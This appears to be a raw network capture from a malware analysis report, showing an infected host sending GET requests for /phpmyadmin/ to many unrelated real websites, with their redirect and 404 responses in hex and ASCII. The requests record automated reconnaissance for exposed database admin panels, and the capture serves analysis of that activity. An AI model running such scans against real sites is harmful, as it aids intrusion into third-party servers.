Feb 21, 2024 00:26:08.501107931 CET	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.678493977 CET	433	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:08 GMT Server: Apache Location: https://popular.de/phpmyadmin/ Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 70 75 6c 61 72 2e 64 65 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://popular.de/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.6	55953	185.230.63.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.543239117 CET	178	OUT	GET /phpmyadmin/ HTTP/1.1 Host: sportclinic.co.il Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.658653975 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1708471568.5841474889735131813 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLlAwLb1tXR23DYhcoMEdpYDu/2EjeiyKjB/JVOb8T5Ve,2d58ifebGbosy5xc+FRalqL0nQnEA3y75sfTMFFEpDD5YDxchWjcpg+/I0IXVGKaCBKpq3nPY1N6rHRwSWtdlw==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,oeCSbq11YyM2LrWdre0MiAPBzEMPrQyi9uZsFRcWByA=,GCZRqREx605Y6yDgjOvSr0gzVvd88M9o49AqjE+T7lA=,/j+AjfLiOiE0Vc9NsP8sK9OGBA8EjSrrb+o8MGqPfV+fyFdu1BpPpgIayAnxFT6M+El08WdAlazUFNCK4dJeYQ== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 51 e2 2c 4e 26 05 e8 b2 0e cb cb 30 6c 28 b0 a1 28 0a 5a 3a db 4c 28 52 25 a9 d8 46 d7 ff 7d 77 94 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 c5 21 e7 8c 71 7e 75 70 50 1c d6 b6 0a ab 16 d8 3c 34 fa 0a cf 9c 1f 30 fc d0 6d 41 34 66 66 5c b6 6d 99 2c d4 f2 bd 73 d6 fd 2e 67 e0 df b5 6d 42 0f 40 d6 57 f8 be 68 20 48 66 64 03 65 72 af 60 d1 5a 17 12 56 59 13 c0 04 62 ad c3 bc ac e1 5e 55 c0 e3 e1 48 19 15 94 d4 dc 57 52 43 99 1f b1 46 2e 55 d3 35 ff 11 3a 0f 2e 9e e4 04 5f 18 8b fa d6 8a aa b9 74 1e 50 70 17 a6 7c bc 75 31 0f a1 e5 f0 a5 53 f7 65 f2 17 ff f0 8e 5f db a6 95 41 a1 84 2d 73 6e de 97 50 cf a0 e7 0b 2a 68 20 90 13 65 ea 32 49 5b 84 f7 39 12 53 f6 0f 0b 4e 1a af 65 c0 c7 85 88 d4 c7 70 6b f0 95 53 6d 50 d6 6c a9 d8 b2 69 0f af ec 70 39 3b b1 c1 6f c9 35 16 ad 84 e5 11 33 76 6a b5 b6 8b 9e 65 13 50 0a 5d a1 95 b9 63 14 d4 32 51 0d c2 11 ad 99 25 6c ee 60 5a 26 42 2c 16 8b 0c 63 99 55 b6 11 53 89 21 b1 26 c3 af 84 39 d0 65 e2 e7 18 ba aa 0b 8c e8 3b c2 7b d1 6b 49 3e a0 6b ab ac 95 4e fa 60 1d 6a 8a 42 31 6e 14 68 2f c2 5c b9 9a e3 75 58 89 29 e6 82 17 bf 82 be 07 e4 91 f1 fc 8b ac 90 c3 23 be 5e 75 58 69 f0 73 00 4c 9d de fa 00 cb 20 e2 03 11 dd be 05 b3 b7 64 87 ef b9 a6 a1 03 78 db 4d b4 aa 44 9e 9d e7 17 d9 b1 f0 51 bd 00 ca 71 34 1a 93 7c 20 45 13 1f ea 2f 44 9f f9 c5 c4 d6 2b a6 a5 99 95 09 60 fc Data Ascii: 444Vo6_E-Q,N&0l((Z:L(R%F}w9ql7c!q~upP<40mA4ff\m,s.gmB@Wh Hfder`ZVYb^UHWRCF.U5:._tPp\|u1Se_A-snP*h e2I[9SNepkSmPlip9;o53vjeP]c2Q%l`Z&B,cUS!&9e;{kI>kN`jB1nh/\uX)#^uXisL dxMDQq4\| E/D+`
Feb 21, 2024 00:26:08.658684969 CET	629	IN	Data Raw: 31 8d 28 e9 1d 86 06 5c 99 6c ea e5 7a 43 64 d2 b3 a8 82 ca e8 3a 38 8d c1 d5 d2 7b e4 df 28 a6 7a eb 65 f5 37 5f 53 0f 28 b6 96 6e c5 27 b2 ba 9b 39 db 99 3a bd 64 ca ff b9 be f8 69 43 ff 86 b6 92 a7 3e aa 29 d3 81 dd bc 67 17 9f 90 d2 67 29 f3 Data Ascii: 1(\lzCd:8{(ze7_S(n'9:diC>)gg)$'tFd9i}e[L!z;J\f3kgd\|L&^~qv2yLbGpxt'qvVp^l[btZ[OONWpGfkKM3\|'xuP7uS[

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.6	55933	208.109.43.169	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.570084095 CET	179	OUT	GET /phpmyadmin/ HTTP/1.1 Host: waukesha-water.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.730003119 CET	449	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:08 GMT Server: Apache Location: https://waukesha-water.com/phpmyadmin/ Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 61 75 6b 65 73 68 61 2d 77 61 74 65 72 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://waukesha-water.com/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.6	56013	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.636703968 CET	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.734488964 CET	225	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/phpmyadmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.6	56025	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.645464897 CET	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.742536068 CET	224	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/phpmyadmin/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:08.948367119 CET	224	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/phpmyadmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.6	56022	72.52.178.23	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.664463043 CET	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: imailzone.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.6	56031	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.675162077 CET	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.776165962 CET	222	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/phpmyadmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.6	55979	91.195.240.135	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.675913095 CET	176	OUT	GET /phpmyadmin/ HTTP/1.1 Host: schussundtor.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.856856108 CET	343	IN	HTTP/1.1 301 Moved Permanently date: Tue, 20 Feb 2024 23:26:08 GMT content-type: text/html content-length: 166 location: //www.schussundtor.de/phpmyadmin/ server: NginX Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.6	56027	198.185.159.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.676345110 CET	173	OUT	GET /phpmyadmin/ HTTP/1.1 Host: mwpmedia.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.771289110 CET	1276	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77562 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:08 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: DlNNcL8N/kZQwWwBZ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; c
Feb 21, 2024 00:26:08.771336079 CET	1276	IN	Data Raw: 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: olor: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family: 'Clarkson'; font-
Feb 21, 2024 00:26:08.771405935 CET	1276	IN	Data Raw: 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 31 75 6f 5a 46 46 49 77 58 30 76 79 48 75 45 6a 48 59 48 32 56 6d 72 Data Ascii: LWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMttrEh8jq70i9RKy000O7s/J2
Feb 21, 2024 00:26:08.771610975 CET	268	IN	Data Raw: 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 59 51 4c 64 5a 47 75 47 6a 75 6d 36 37 4f 36 76 73 34 70 7a 6e 4e 4e Data Ascii: xqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+rKdvVh6f1F0Y/zD8P1sa53N
Feb 21, 2024 00:26:08.771648884 CET	1276	IN	Data Raw: 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a 6d 6b 31 33 69 51 68 5a 70 56 76 77 57 61 65 4a 4a 76 5a 77 6d 5a 66 Data Ascii: 4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS5yocFv2WSejEdfhwp5nBV/y
Feb 21, 2024 00:26:08.771748066 CET	1276	IN	Data Raw: 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a 31 4b 74 35 6c 47 73 76 61 68 79 6a 4d 75 52 56 48 49 4e 4b 49 41 53 Data Ascii: b3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFIiJPGPnKHYK2JjCRhQbe7Dxt
Feb 21, 2024 00:26:08.771815062 CET	1276	IN	Data Raw: 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 2f 4d 30 39 6b 66 67 47 63 66 7a 42 4f 77 72 79 52 61 56 44 73 36 44 Data Ascii: JIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2uE5F6+znJOlnPHleN2O10143
Feb 21, 2024 00:26:08.771913052 CET	1276	IN	Data Raw: 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 78 47 4f 70 71 4a 4c 78 51 45 50 50 38 65 62 6b 68 32 78 6a 78 50 73 Data Ascii: ZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3jzHBrGuPR1YpMFFrB1bJ8us
Feb 21, 2024 00:26:08.772363901 CET	1276	IN	Data Raw: 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 6d 38 78 79 37 34 61 37 52 49 71 32 52 79 68 4c 4c 71 34 76 45 4e 78 Data Ascii: KKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOYMOd3ZMy3lBovUZqA+G9Ip1V
Feb 21, 2024 00:26:08.772501945 CET	1276	IN	Data Raw: 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 59 57 74 62 4f 4d 45 64 72 4b 62 50 65 78 6c 48 77 64 34 48 69 2f 67 Data Ascii: W9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBWNubh73czs77OmucVf3h6/Pn
Feb 21, 2024 00:26:08.862329960 CET	1276	IN	Data Raw: 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 59 36 63 35 53 4e 6e 32 63 68 5a 4c 72 37 35 4d 79 53 4d 55 44 65 44 Data Ascii: /qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMfwYCj9K4ceU8KMt/MiGH+nwo

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.6	55983	78.47.2.70	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.682375908 CET	183	OUT	GET /phpmyadmin/ HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.866383076 CET	413	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:08 GMT Server: Apache Content-Length: 268 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 